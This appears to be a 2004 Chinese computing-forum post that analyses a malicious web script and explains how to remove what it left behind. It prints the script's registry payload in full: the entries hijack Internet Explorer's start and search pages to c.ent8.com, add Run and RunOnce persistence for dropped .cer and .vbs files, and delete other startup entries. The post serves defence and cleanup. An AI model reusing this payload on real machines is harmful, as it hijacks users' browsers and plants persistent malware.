刪除C:\$NtUninstallQ8875736$目錄下的兩個文件，同時清理一下注冊表

來源: écho 於 2004-03-15 12:55:16 [檔案] [舊帖] [給我悄悄話] 本文已被閱讀：次 (11217 bytes)

那個網頁吊用了這段代碼，http://www.6826.com/code.asp，可以用快車把代碼下下來，然後用記事本打開看看，它做了哪些手腳，用IE遊覽該網站後果自負！

初步看了一下，它做的手腳有：

1、生成兩個文件：

"C:\$NtUninstallQ8875736$\WINSYS.cer"
"C:\$NtUninstallQ8875736$\WINSYS.vbs"

代碼運行了 regedit /s C:\$NtUninstallQ8875736$\WINSYS.cer

所以必須刪除這兩個文件

2、可能修改的注冊表項有

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
"SearchURL"="http://c.ent8.com/"

[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer]
"SearchURL"="http://c.ent8.com/"

[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Main]
"Search Page"="http://c.ent8.com/"
"Default_Search_URL"="http://c.ent8.com/"
"Search Bar"="http://c.ent8.com/"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://c.ent8.com/"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://c.ent8.com/"

[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://c.ent8.com/"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page"="http://c.ent8.com"
"First Home Page"="http://c.ent8.com"
"Default_Search_URL"="http://c.ent8.com/"
"Search Page"="http://c.ent8.com/"
"Search Bar"="http://c.ent8.com/"
"Local Page"="http://c.ent8.com"

[HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run]
@="regedit -s C:\\$NtUninstallQ8875736$\\WINSYS.cer"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL"="http://c.ent8.com"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Default_Search_URL"="http://c.ent8.com/"
"Search Page"="http://c.ent8.com/"
"Search Bar"="http://c.ent8.com/"
"SearchURL"="http://c.ent8.com/"
"Start Page"="http://c.ent8.com"
"First Home Page"="http://c.ent8.com"
"Default_Page_URL"="http://c.ent8.com"
"Local Page"="http://c.ent8.com"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"LogFeil"="C:\\$NtUninstallQ8875736$\\WINSYS.vbs"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"LogFeil"="regedit -s C:\\$NtUninstallQ8875736$\\WINSYS.cer"
"internat.exe"="internat.exe"
"zwupdows"=-
"win"=-
"mwin"=-
"intenet"=-
"Inernet"=-
"Internet"=-
"iexpleror"=-
"zxdows"=-
"qwe"=-
"win1"=-
"winwin"=-
"9i5zxdows"=-
"9i5com01zxdows"=-
"99zxdows"=-
"syste"=-
"intelnat.exe"=-
"88zxdows"=-
"Start Pagewin"=-
"Start Page"=-
"9i5comzxdows"=-
"9q5zxdows"=-
"999izxdows"=-
"033zxdows"=-
"8zxdows"=-
"flash"=-

"3zxdows"=-
"interneet.exe"=-
"u88y"=-
"88u88"=-
"u18"=-
"u1881"=-
"u1882"=-
"u1883"=-
"u1884"=-
"u1885"=-
"u1886"=-
"u1887"=-
"u1888"=-
"system"=-
"u188"=-
"iexpler"=-
"u1810"=-
"WIN32"=-
"W1N32"=-
"Abank"=-
"Ziplog"=-
"SystemServices"=-
"stup"=-
"Services"=-
"WJQ32"=-
"syslog"=-

rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LogFeil","regedit -s C:\$NtUninstallQ8875736$\WINSYS.cer"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\internat.exe","internat.exe"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\zwupdows","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\win","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mwin","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\internt","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Inernet","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Internet","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iexpleror","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\zxdows","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\qwe","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\win1","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\intelnat.exe","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u1888","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\intenet","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9i5zxdows","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9i5com01zxdows","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\99zxdows","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\88zxdows","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Start Pagewin","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Start Page","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u188","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9i5comzxdows","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9q5zxdows","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u1881","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u1882","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u1883","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u1884","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u1885","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u1886","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u1887","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u88y", "12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\flash", "12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\999izxdows","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\033zxdows","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\syste","12"
rw "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\my","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3zxdows","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\88u88","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8zxdows","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u18","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\interneet.exe","12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2RunOnce\", "12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iexpler", "12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u1810", "12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winwin", "12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WIN32", "12"
rw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\W1N32", "12"
rd "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\zwupdows"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\win"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mwin"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\internt"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\inernet"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Internet"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u188"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iexpleror"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\zxdows"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\qwe"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\win1"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\intelnat.exe"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\intenet"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9i5zxdows"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9i5com01zxdows"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\99zxdows"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\88zxdows"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Start Pagewin"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Start Page"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9i5comzxdows"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9q5zxdows"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\999izxdows"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\033zxdows"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u1881"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u1882"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u1883"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u1884"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u1885"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u1886"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u1887"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u88y"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\flash"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\88u88"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\interneet.exe"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u18"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u1888"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3zxdows"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8zxdows"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\syste"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2RunOnce\"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iexpler"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u1810"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winwin"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WIN32"
rd "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\W1N32"

其中
rw 代表寫入注冊表項，
rd 代表刪除注冊表項

3、改動了 c:\windows\win.ini

看一下，有可疑的行刪掉，主要是 run= load= 那些行

您的位置：文學城 » 論壇 » 實用電腦 » 刪除C:\$NtUninstallQ8875736$目錄下的兩個文件，同時清理一下注冊表

請您先登陸，再發跟帖！

刪除C:\$NtUninstallQ8875736$目錄下的兩個文件，同時清理一下注冊表

發現Adblock插件

如要繼續瀏覽
請支持本站請務必在本站關閉/移除任何Adblock

請參考如何關閉Adblock/Adblock plus

安裝Adblock plus用戶請點擊瀏覽器圖標
選擇“Disable on www.wenxuecity.com”

安裝Adblock用戶請點擊圖標
選擇“don't run on pages on this domain”

刪除C:\$NtUninstallQ8875736$目錄下的兩個文件，同時清理一下注冊表

發現Adblock插件

如要繼續瀏覽 請支持本站 請務必在本站關閉/移除任何Adblock

請參考如何關閉Adblock/Adblock plus

安裝Adblock plus用戶請點擊瀏覽器圖標選擇“Disable on www.wenxuecity.com”

安裝Adblock用戶請點擊圖標 選擇“don't run on pages on this domain”

如要繼續瀏覽
請支持本站請務必在本站關閉/移除任何Adblock

安裝Adblock plus用戶請點擊瀏覽器圖標
選擇“Disable on www.wenxuecity.com”

安裝Adblock用戶請點擊圖標
選擇“don't run on pages on this domain”